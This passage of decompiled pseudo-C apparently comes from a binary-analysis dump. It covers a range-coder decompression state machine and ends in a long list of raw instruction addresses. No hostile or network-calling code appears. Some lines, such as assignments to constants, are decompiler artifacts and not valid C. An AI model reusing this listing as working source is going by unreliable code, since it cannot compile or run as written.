                  												 *(__ebp - 0x54) = __esi;
                  												__edi = __ax & 0x0000ffff;
                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  												__eflags =  *(__ebp - 0xc) - __ecx;
                  												if( *(__ebp - 0xc) >= __ecx) {
                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  													__cx = __ax;
                  													_t170 = __edx + 1; // 0x1
                  													__ebx = _t170;
                  													__cx = __ax >> 5;
                  													__eflags = __eax;
                  													 *__esi = __ax;
                  												} else {
                  													 *(__ebp - 0x10) = __ecx;
                  													0x800 = 0x800 - __edi;
                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  													__ebx = __ebx + __ebx;
                  													 *__esi = __cx;
                  												}
                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                  												 *(__ebp - 0x44) = __ebx;
                  												if( *(__ebp - 0x10) >= 0x1000000) {
                  													continue;
                  												} else {
                  													goto L46;
                  												}
                  											}
                  											L54:
                  											_t173 = __ebp - 0x34;
                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                  											__eflags =  *_t173;
                  											goto L55;
                  										case 0xf:
                  											L58:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												 *(__ebp - 0x88) = 0xf;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t203 = __ebp - 0x70;
                  											 *_t203 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t203;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											L60:
                  											__eflags = __ebx - 0x100;
                  											if(__ebx >= 0x100) {
                  												L55:
                  												__al =  *(__ebp - 0x44);
                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                  												goto L56;
                  											}
                  											L61:
                  											__eax =  *(__ebp - 0x58);
                  											__edx = __ebx + __ebx;
                  											__ecx =  *(__ebp - 0x10);
                  											__esi = __edx + __eax;
                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                  											__ax =  *__esi;
                  											 *(__ebp - 0x54) = __esi;
                  											__edi = __ax & 0x0000ffff;
                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  											__eflags =  *(__ebp - 0xc) - __ecx;
                  											if( *(__ebp - 0xc) >= __ecx) {
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  												__cx = __ax;
                  												_t217 = __edx + 1; // 0x1
                  												__ebx = _t217;
                  												__cx = __ax >> 5;
                  												__eflags = __eax;
                  												 *__esi = __ax;
                  											} else {
                  												 *(__ebp - 0x10) = __ecx;
                  												0x800 = 0x800 - __edi;
                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  												__ebx = __ebx + __ebx;
                  												 *__esi = __cx;
                  											}
                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                  											 *(__ebp - 0x44) = __ebx;
                  											if( *(__ebp - 0x10) >= 0x1000000) {
                  												goto L60;
                  											} else {
                  												goto L58;
                  											}
                  										case 0x10:
                  											L109:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												 *(__ebp - 0x88) = 0x10;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t365 = __ebp - 0x70;
                  											 *_t365 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t365;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											goto L111;
                  										case 0x11:
                  											L69:
                  											__esi =  *(__ebp - 0x58);
                  											 *(__ebp - 0x84) = 0x12;
                  											while(1) {
                  												 *(_t613 - 0x54) = _t606;
                  												goto L133;
                  											}
                  										case 0x12:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												__eax =  *(__ebp - 0x58);
                  												 *(__ebp - 0x84) = 0x13;
                  												__esi =  *(__ebp - 0x58) + 2;
                  												while(1) {
                  													 *(_t613 - 0x54) = _t606;
                  													goto L133;
                  												}
                  											}
                  											__eax =  *(__ebp - 0x4c);
                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                  											__ecx =  *(__ebp - 0x58);
                  											__eax =  *(__ebp - 0x4c) << 4;
                  											__eflags = __eax;
                  											__eax =  *(__ebp - 0x58) + __eax + 4;
                  											goto L130;
                  										case 0x13:
                  											__eflags =  *(__ebp - 0x40);
                  											if( *(__ebp - 0x40) != 0) {
                  												_t469 = __ebp - 0x58;
                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                  												__eflags =  *_t469;
                  												 *(__ebp - 0x30) = 0x10;
                  												 *(__ebp - 0x40) = 8;
                  												L144:
                  												 *(__ebp - 0x7c) = 0x14;
                  												goto L145;
                  											}
                  											__eax =  *(__ebp - 0x4c);
                  											__ecx =  *(__ebp - 0x58);
                  											__eax =  *(__ebp - 0x4c) << 4;
                  											 *(__ebp - 0x30) = 8;
                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                  											L130:
                  											 *(__ebp - 0x58) = __eax;
                  											 *(__ebp - 0x40) = 3;
                  											goto L144;
                  										case 0x14:
                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                  											__eax =  *(__ebp - 0x80);
                  											 *(_t613 - 0x88) = _t533;
                  											goto L1;
                  										case 0x15:
                  											__eax = 0;
                  											__eflags =  *(__ebp - 0x38) - 7;
                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                  											__al = __al & 0x000000fd;
                  											__eax = (__eflags >= 0) - 1 + 0xb;
                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                  											goto L120;
                  										case 0x16:
                  											__eax =  *(__ebp - 0x30);
                  											__eflags = __eax - 4;
                  											if(__eax >= 4) {
                  												_push(3);
                  												_pop(__eax);
                  											}
                  											__ecx =  *(__ebp - 4);
                  											 *(__ebp - 0x40) = 6;
                  											__eax = __eax << 7;
                  											 *(__ebp - 0x7c) = 0x19;
                  											 *(__ebp - 0x58) = __eax;
                  											goto L145;
                  										case 0x17:
                  											L145:
                  											__eax =  *(__ebp - 0x40);
                  											 *(__ebp - 0x50) = 1;
                  											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                  											goto L149;
                  										case 0x18:
                  											L146:
                  											__eflags =  *(__ebp - 0x6c);
                  											if( *(__ebp - 0x6c) == 0) {
                  												 *(__ebp - 0x88) = 0x18;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x70);
                  											__eax =  *(__ebp - 0xc);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											_t484 = __ebp - 0x70;
                  											 *_t484 =  *(__ebp - 0x70) + 1;
                  											__eflags =  *_t484;
                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                  											L148:
                  											_t487 = __ebp - 0x48;
                  											 *_t487 =  *(__ebp - 0x48) - 1;
                  											__eflags =  *_t487;
                  											L149:
                  											__eflags =  *(__ebp - 0x48);
                  											if( *(__ebp - 0x48) <= 0) {
                  												__ecx =  *(__ebp - 0x40);
                  												__ebx =  *(__ebp - 0x50);
                  												0 = 1;
                  												__eax = 1 << __cl;
                  												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                  												__eax =  *(__ebp - 0x7c);
                  												 *(__ebp - 0x44) = __ebx;
                  												while(1) {
                  													 *(_t613 - 0x88) = _t533;
                  													goto L1;
                  												}
                  											}
                  											__eax =  *(__ebp - 0x50);
                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                  											__eax =  *(__ebp - 0x58);
                  											__esi = __edx + __eax;
                  											 *(__ebp - 0x54) = __esi;
                  											__ax =  *__esi;
                  											__edi = __ax & 0x0000ffff;
                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                  											__eflags =  *(__ebp - 0xc) - __ecx;
                  											if( *(__ebp - 0xc) >= __ecx) {
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                  												__cx = __ax;
                  												__cx = __ax >> 5;
                  												__eax = __eax - __ecx;
                  												__edx = __edx + 1;
                  												__eflags = __edx;
                  												 *__esi = __ax;
                  												 *(__ebp - 0x50) = __edx;
                  											} else {
                  												 *(__ebp - 0x10) = __ecx;
                  												0x800 = 0x800 - __edi;
                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                  												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                  												 *__esi = __cx;
                  											}
                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                  											if( *(__ebp - 0x10) >= 0x1000000) {
                  												goto L148;
                  											} else {
                  												goto L146;
                  											}
                  										case 0x19:
                  											__eflags = __ebx - 4;
                  											if(__ebx < 4) {
                  												 *(__ebp - 0x2c) = __ebx;
                  												L119:
                  												_t393 = __ebp - 0x2c;
                  												 *_t393 =  *(__ebp - 0x2c) + 1;
                  												__eflags =  *_t393;
                  												L120:
                  												__eax =  *(__ebp - 0x2c);
                  												__eflags = __eax;
                  												if(__eax == 0) {
                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                  													goto L170;
                  												}
                  												__eflags = __eax -  *(__ebp - 0x60);
                  												if(__eax >  *(__ebp - 0x60)) {
                  													goto L171;
                  												}
                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                  												__eax =  *(__ebp - 0x30);
                  												_t400 = __ebp - 0x60;
                  												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                  												__eflags =  *_t400;
                  												goto L123;
                  											}
                  											__ecx = __ebx;
                  											__eax = __ebx;
                  											__ecx = __ebx >> 1;
                  											__eax = __ebx & 0x00000001;
                  											__ecx = (__ebx >> 1) - 1;
                  											__al = __al | 0x00000002;
                  											__eax = (__ebx & 0x00000001) << __cl;
                  											__eflags = __ebx - 0xe;
                  											 *(__ebp - 0x2c) = __eax;
                  											if(__ebx >= 0xe) {
                  												__ebx = 0;
                  												 *(__ebp - 0x48) = __ecx;
                  												L102:
                  												__eflags =  *(__ebp - 0x48);
                  												if( *(__ebp - 0x48) <= 0) {
                  													__eax = __eax + __ebx;
                  													 *(__ebp - 0x40) = 4;
                  													 *(__ebp - 0x2c) = __eax;
                  													__eax =  *(__ebp - 4);
                  													__eax =  *(__ebp - 4) + 0x644;
                  													__eflags = __eax;
                  													L108:
                  													__ebx = 0;
                  													 *(__ebp - 0x58) = __eax;
                  													 *(__ebp - 0x50) = 1;
                  													 *(__ebp - 0x44) = 0;
                  													 *(__ebp - 0x48) = 0;
                  													L112:
                  													__eax =  *(__ebp - 0x40);
                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                  														_t391 = __ebp - 0x2c;
                  														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                  														__eflags =  *_t391;
                  														goto L119;
                  													}
                  													__eax =  *(__ebp - 0x50);
                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                  													__eax =  *(__ebp - 0x58);
                  													__esi = __edi + __eax;
                  													 *(__ebp - 0x54) = __esi;
                  													__ax =  *__esi;
                  													__ecx = __ax & 0x0000ffff;
                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                  													__eflags =  *(__ebp - 0xc) - __edx;
                  													if( *(__ebp - 0xc) >= __edx) {
                  														__ecx = 0;
                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                  														__ecx = 1;
                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                  														__ebx = 1;
                  														__ecx =  *(__ebp - 0x48);
                  														__ebx = 1 << __cl;
                  														__ecx = 1 << __cl;
                  														__ebx =  *(__ebp - 0x44);
                  														__ebx =  *(__ebp - 0x44) | __ecx;
                  														__cx = __ax;
                  														__cx = __ax >> 5;
                  														__eax = __eax - __ecx;
                  														__edi = __edi + 1;
                  														__eflags = __edi;
                  														 *(__ebp - 0x44) = __ebx;
                  														 *__esi = __ax;
                  														 *(__ebp - 0x50) = __edi;
                  													} else {
                  														 *(__ebp - 0x10) = __edx;
                  														0x800 = 0x800 - __ecx;
                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                  														 *__esi = __dx;
                  													}
                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                  													if( *(__ebp - 0x10) >= 0x1000000) {
                  														L111:
                  														_t368 = __ebp - 0x48;
                  														 *_t368 =  *(__ebp - 0x48) + 1;
                  														__eflags =  *_t368;
                  														goto L112;
                  													} else {
                  														goto L109;
                  													}
                  												}
                  												__ecx =  *(__ebp - 0xc);
                  												__ebx = __ebx + __ebx;
                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                  												 *(__ebp - 0x44) = __ebx;
                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                  													__ecx =  *(__ebp - 0x10);
                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                  													__ebx = __ebx | 0x00000001;
                  													__eflags = __ebx;
                  													 *(__ebp - 0x44) = __ebx;
                  												}
                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                  												if( *(__ebp - 0x10) >= 0x1000000) {
                  													L101:
                  													_t338 = __ebp - 0x48;
                  													 *_t338 =  *(__ebp - 0x48) - 1;
                  													__eflags =  *_t338;
                  													goto L102;
                  												} else {
                  													goto L99;
                  												}
                  											}
                  											__edx =  *(__ebp - 4);
                  											__eax = __eax - __ebx;
                  											 *(__ebp - 0x40) = __ecx;
                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                  											goto L108;
                  										case 0x1a:
                  											L56:
                  											__eflags =  *(__ebp - 0x64);
                  											if( *(__ebp - 0x64) == 0) {
                  												 *(__ebp - 0x88) = 0x1a;
                  												goto L170;
                  											}
                  											__ecx =  *(__ebp - 0x68);
                  											__al =  *(__ebp - 0x5c);
                  											__edx =  *(__ebp - 8);
                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                  											 *( *(__ebp - 0x68)) = __al;
                  											__ecx =  *(__ebp - 0x14);
                  											 *(__ecx +  *(__ebp - 8)) = __al;
                  											__eax = __ecx + 1;
                  											__edx = 0;
                  											_t192 = __eax %  *(__ebp - 0x74);
                  											__eax = __eax /  *(__ebp - 0x74);
                  											__edx = _t192;
                  											goto L79;
                  										case 0x1b:
                  											L75:
                  											__eflags =  *(__ebp - 0x64);
                  											if( *(__ebp - 0x64) == 0) {
                  												 *(__ebp - 0x88) = 0x1b;
                  												goto L170;
                  											}
                  											__eax =  *(__ebp - 0x14);
                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  											__eflags = __eax -  *(__ebp - 0x74);
                  											if(__eax >=  *(__ebp - 0x74)) {
                  												__eax = __eax +  *(__ebp - 0x74);
                  												__eflags = __eax;
                  											}
                  											__edx =  *(__ebp - 8);
                  											__cl =  *(__eax + __edx);
                  											__eax =  *(__ebp - 0x14);
                  											 *(__ebp - 0x5c) = __cl;
                  											 *(__eax + __edx) = __cl;
                  											__eax = __eax + 1;
                  											__edx = 0;
                  											_t274 = __eax %  *(__ebp - 0x74);
                  											__eax = __eax /  *(__ebp - 0x74);
                  											__edx = _t274;
                  											__eax =  *(__ebp - 0x68);
                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  											_t283 = __ebp - 0x64;
                  											 *_t283 =  *(__ebp - 0x64) - 1;
                  											__eflags =  *_t283;
                  											 *( *(__ebp - 0x68)) = __cl;
                  											L79:
                  											 *(__ebp - 0x14) = __edx;
                  											goto L80;
                  										case 0x1c:
                  											while(1) {
                  												L123:
                  												__eflags =  *(__ebp - 0x64);
                  												if( *(__ebp - 0x64) == 0) {
                  													break;
                  												}
                  												__eax =  *(__ebp - 0x14);
                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                  												__eflags = __eax -  *(__ebp - 0x74);
                  												if(__eax >=  *(__ebp - 0x74)) {
                  													__eax = __eax +  *(__ebp - 0x74);
                  													__eflags = __eax;
                  												}
                  												__edx =  *(__ebp - 8);
                  												__cl =  *(__eax + __edx);
                  												__eax =  *(__ebp - 0x14);
                  												 *(__ebp - 0x5c) = __cl;
                  												 *(__eax + __edx) = __cl;
                  												__eax = __eax + 1;
                  												__edx = 0;
                  												_t414 = __eax %  *(__ebp - 0x74);
                  												__eax = __eax /  *(__ebp - 0x74);
                  												__edx = _t414;
                  												__eax =  *(__ebp - 0x68);
                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                  												__eflags =  *(__ebp - 0x30);
                  												 *( *(__ebp - 0x68)) = __cl;
                  												 *(__ebp - 0x14) = _t414;
                  												if( *(__ebp - 0x30) > 0) {
                  													continue;
                  												} else {
                  													L80:
                  													 *(__ebp - 0x88) = 2;
                  													goto L1;
                  												}
                  											}
                  											 *(__ebp - 0x88) = 0x1c;
                  											goto L170;
                  									}
                  								}
                  								L171:
                  								_t535 = _t534 | 0xffffffff;
                  								goto L172;
                  							}
                  						}
                  					}
                  				}
                  			}













                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004066bb
                  0x004066bb
                  0x004066c1
                  0x004066c7
                  0x004066cd
                  0x004066e7
                  0x004066ea
                  0x004066f0
                  0x004066fb
                  0x004066fd
                  0x004066cf
                  0x004066cf
                  0x004066de
                  0x004066e2
                  0x004066e2
                  0x00406707
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040604c
                  0x0040604e
                  0x00406051
                  0x004060c2
                  0x004060c5
                  0x004060c8
                  0x004060cf
                  0x004060d9
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x00406053
                  0x00406057
                  0x0040605a
                  0x0040605c
                  0x0040605f
                  0x00406062
                  0x00406064
                  0x00406067
                  0x00406069
                  0x0040606e
                  0x00406071
                  0x00406074
                  0x00406078
                  0x0040607f
                  0x00406082
                  0x00406089
                  0x0040608d
                  0x00406095
                  0x00406095
                  0x00406095
                  0x0040608f
                  0x0040608f
                  0x0040608f
                  0x00406084
                  0x00406084
                  0x00406084
                  0x00406099
                  0x0040609c
                  0x004060ba
                  0x004060bc
                  0x00000000
                  0x0040609e
                  0x0040609e
                  0x004060a1
                  0x004060a4
                  0x004060a7
                  0x004060a9
                  0x004060a9
                  0x004060a9
                  0x004060ac
                  0x004060af
                  0x004060b1
                  0x004060b2
                  0x004060b5
                  0x00000000
                  0x004060b5
                  0x00000000
                  0x004062eb
                  0x004062ef
                  0x0040630d
                  0x00406310
                  0x00406317
                  0x0040631a
                  0x0040631d
                  0x00406320
                  0x00406323
                  0x00406326
                  0x00406328
                  0x0040632f
                  0x00406330
                  0x00406332
                  0x00406335
                  0x00406338
                  0x0040633b
                  0x0040633b
                  0x00406340
                  0x00000000
                  0x00406340
                  0x004062f1
                  0x004062f4
                  0x004062f7
                  0x00406301
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00406398
                  0x0040639c
                  0x00000000
                  0x00000000
                  0x004063a2
                  0x004063a6
                  0x00000000
                  0x00000000
                  0x004063ac
                  0x004063ae
                  0x004063b2
                  0x004063b2
                  0x004063b5
                  0x004063b9
                  0x00000000
                  0x00000000
                  0x00406409
                  0x0040640d
                  0x00406414
                  0x00406417
                  0x0040641a
                  0x00406424
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x0040640f
                  0x00000000
                  0x00000000
                  0x00406430
                  0x00406434
                  0x0040643b
                  0x0040643e
                  0x00406441
                  0x00406436
                  0x00406436
                  0x00406436
                  0x00406444
                  0x00406447
                  0x0040644a
                  0x0040644a
                  0x0040644d
                  0x00406450
                  0x00406453
                  0x00406453
                  0x00406456
                  0x0040645d
                  0x00406462
                  0x00000000
                  0x00000000
                  0x004064f0
                  0x004064f0
                  0x004064f4
                  0x00406892
                  0x00000000
                  0x00406892
                  0x004064fa
                  0x004064fd
                  0x00406500
                  0x00406504
                  0x00406507
                  0x0040650d
                  0x0040650f
                  0x0040650f
                  0x0040650f
                  0x00406512
                  0x00406515
                  0x00000000
                  0x00000000
                  0x004060e5
                  0x004060e5
                  0x004060e9
                  0x00406856
                  0x00000000
                  0x00406856
                  0x004060ef
                  0x004060f2
                  0x004060f5
                  0x004060f9
                  0x004060fc
                  0x00406102
                  0x00406104
                  0x00406104
                  0x00406104
                  0x00406107
                  0x0040610a
                  0x0040610a
                  0x0040610d
                  0x00406110
                  0x00000000
                  0x00000000
                  0x00406116
                  0x0040611c
                  0x00000000
                  0x00000000
                  0x00406122
                  0x00406122
                  0x00406126
                  0x00406129
                  0x0040612c
                  0x0040612f
                  0x00406132
                  0x00406133
                  0x00406136
                  0x00406138
                  0x0040613e
                  0x00406141
                  0x00406144
                  0x00406147
                  0x0040614a
                  0x0040614d
                  0x00406150
                  0x0040616c
                  0x0040616f
                  0x00406172
                  0x00406175
                  0x0040617c
                  0x00406180
                  0x00406182
                  0x00406186
                  0x00406152
                  0x00406152
                  0x00406156
                  0x0040615e
                  0x00406163
                  0x00406165
                  0x00406167
                  0x00406167
                  0x00406189
                  0x00406190
                  0x00406193
                  0x00000000
                  0x00406199
                  0x00000000
                  0x00406199
                  0x00000000
                  0x0040619e
                  0x0040619e
                  0x004061a2
                  0x00406862
                  0x00000000
                  0x00406862
                  0x004061a8
                  0x004061ab
                  0x004061ae
                  0x004061b2
                  0x004061b5
                  0x004061bb
                  0x004061bd
                  0x004061bd
                  0x004061bd
                  0x004061c0
                  0x004061c3
                  0x004061c3
                  0x004061c3
                  0x004061c9
                  0x00000000
                  0x00000000
                  0x004061cb
                  0x004061ce
                  0x004061d1
                  0x004061d4
                  0x004061d7
                  0x004061da
                  0x004061dd
                  0x004061e0
                  0x004061e3
                  0x004061e6
                  0x004061e9
                  0x00406201
                  0x00406204
                  0x00406207
                  0x0040620a
                  0x0040620a
                  0x0040620d
                  0x00406211
                  0x00406213
                  0x004061eb
                  0x004061eb
                  0x004061f3
                  0x004061f8
                  0x004061fa
                  0x004061fc
                  0x004061fc
                  0x00406216
                  0x0040621d
                  0x00406220
                  0x00000000
                  0x00406222
                  0x00000000
                  0x00406222
                  0x00406220
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00406227
                  0x00000000
                  0x00000000
                  0x00406262
                  0x00406262
                  0x00406266
                  0x0040686e
                  0x00000000
                  0x0040686e
                  0x0040626c
                  0x0040626f
                  0x00406272
                  0x00406276
                  0x00406279
                  0x0040627f
                  0x00406281
                  0x00406281
                  0x00406281
                  0x00406284
                  0x00406287
                  0x00406287
                  0x0040628d
                  0x0040622b
                  0x0040622b
                  0x0040622e
                  0x00000000
                  0x0040622e
                  0x0040628f
                  0x0040628f
                  0x00406292
                  0x00406295
                  0x00406298
                  0x0040629b
                  0x0040629e
                  0x004062a1
                  0x004062a4
                  0x004062a7
                  0x004062aa
                  0x004062ad
                  0x004062c5
                  0x004062c8
                  0x004062cb
                  0x004062ce
                  0x004062ce
                  0x004062d1
                  0x004062d5
                  0x004062d7
                  0x004062af
                  0x004062af
                  0x004062b7
                  0x004062bc
                  0x004062be
                  0x004062c0
                  0x004062c0
                  0x004062da
                  0x004062e1
                  0x004062e4
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x004062e6
                  0x00000000
                  0x00406573
                  0x00406573
                  0x00406577
                  0x0040689e
                  0x00000000
                  0x0040689e
                  0x0040657d
                  0x00406580
                  0x00406583
                  0x00406587
                  0x0040658a
                  0x00406590
                  0x00406592
                  0x00406592
                  0x00406592
                  0x00406595
                  0x00000000
                  0x00000000
                  0x00406343
                  0x00406343
                  0x00406346
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x00000000
                  0x00406682
                  0x00406686
                  0x004066a8
                  0x004066ab
                  0x004066b5
                  0x004066b8
                  0x004066b8
                  0x00000000
                  0x004066b8
                  0x004066b8
                  0x00406688
                  0x0040668b
                  0x0040668f
                  0x00406692
                  0x00406692
                  0x00406695
                  0x00000000
                  0x00000000
                  0x0040673f
                  0x00406743
                  0x00406761
                  0x00406761
                  0x00406761
                  0x00406768
                  0x0040676f
                  0x00406776
                  0x00406776
                  0x00000000
                  0x00406776
                  0x00406745
                  0x00406748
                  0x0040674b
                  0x0040674e
                  0x00406755
                  0x00406699
                  0x00406699
                  0x0040669c
                  0x00000000
                  0x00000000
                  0x00406830
                  0x00406833
                  0x00406734
                  0x00000000
                  0x00000000
                  0x0040646a
                  0x0040646c
                  0x00406473
                  0x00406474
                  0x00406476
                  0x00406479
                  0x00000000
                  0x00000000
                  0x00406481
                  0x00406484
                  0x00406487
                  0x00406489
                  0x0040648b
                  0x0040648b
                  0x0040648c
                  0x0040648f
                  0x00406496
                  0x00406499
                  0x004064a7
                  0x00000000
                  0x00000000
                  0x0040677d
                  0x0040677d
                  0x00406780
                  0x00406787
                  0x00000000
                  0x00000000
                  0x0040678c
                  0x0040678c
                  0x00406790
                  0x004068c8
                  0x00000000
                  0x004068c8
                  0x00406796
                  0x00406799
                  0x0040679c
                  0x004067a0
                  0x004067a3
                  0x004067a9
                  0x004067ab
                  0x004067ab
                  0x004067ab
                  0x004067ae
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b1
                  0x004067b4
                  0x004067b4
                  0x004067b8
                  0x00406818
                  0x0040681b
                  0x00406820
                  0x00406821
                  0x00406823
                  0x00406825
                  0x00406828
                  0x00406734
                  0x00406734
                  0x00000000
                  0x0040673a
                  0x00406734
                  0x004067ba
                  0x004067c0
                  0x004067c3
                  0x004067c6
                  0x004067c9
                  0x004067cc
                  0x004067cf
                  0x004067d2
                  0x004067d5
                  0x004067d8
                  0x004067db
                  0x004067f4
                  0x004067f7
                  0x004067fa
                  0x004067fd
                  0x00406801
                  0x00406803
                  0x00406803
                  0x00406804
                  0x00406807
                  0x004067dd
                  0x004067dd
                  0x004067e5
                  0x004067ea
                  0x004067ec
                  0x004067ef
                  0x004067ef
                  0x0040680a
                  0x00406811
                  0x00000000
                  0x00406813
                  0x00000000
                  0x00406813
                  0x00000000
                  0x004064af
                  0x004064b2
                  0x004064e8
                  0x00406618
                  0x00406618
                  0x00406618
                  0x00406618
                  0x0040661b
                  0x0040661b
                  0x0040661e
                  0x00406620
                  0x004068aa
                  0x00000000
                  0x004068aa
                  0x00406626
                  0x00406629
                  0x00000000
                  0x00000000
                  0x0040662f
                  0x00406633
                  0x00406636
                  0x00406636
                  0x00406636
                  0x00000000
                  0x00406636
                  0x004064b4
                  0x004064b6
                  0x004064b8
                  0x004064ba
                  0x004064bd
                  0x004064be
                  0x004064c0
                  0x004064c2
                  0x004064c5
                  0x004064c8
                  0x004064de
                  0x004064e3
                  0x0040651b
                  0x0040651b
                  0x0040651f
                  0x0040654b
                  0x0040654d
                  0x00406554
                  0x00406557
                  0x0040655a
                  0x0040655a
                  0x0040655f
                  0x0040655f
                  0x00406561
                  0x00406564
                  0x0040656b
                  0x0040656e
                  0x0040659b
                  0x0040659b
                  0x0040659e
                  0x004065a1
                  0x00406615
                  0x00406615
                  0x00406615
                  0x00000000
                  0x00406615
                  0x004065a3
                  0x004065a9
                  0x004065ac
                  0x004065af
                  0x004065b2
                  0x004065b5
                  0x004065b8
                  0x004065bb
                  0x004065be
                  0x004065c1
                  0x004065c4
                  0x004065dd
                  0x004065df
                  0x004065e2
                  0x004065e3
                  0x004065e6
                  0x004065e8
                  0x004065eb
                  0x004065ed
                  0x004065ef
                  0x004065f2
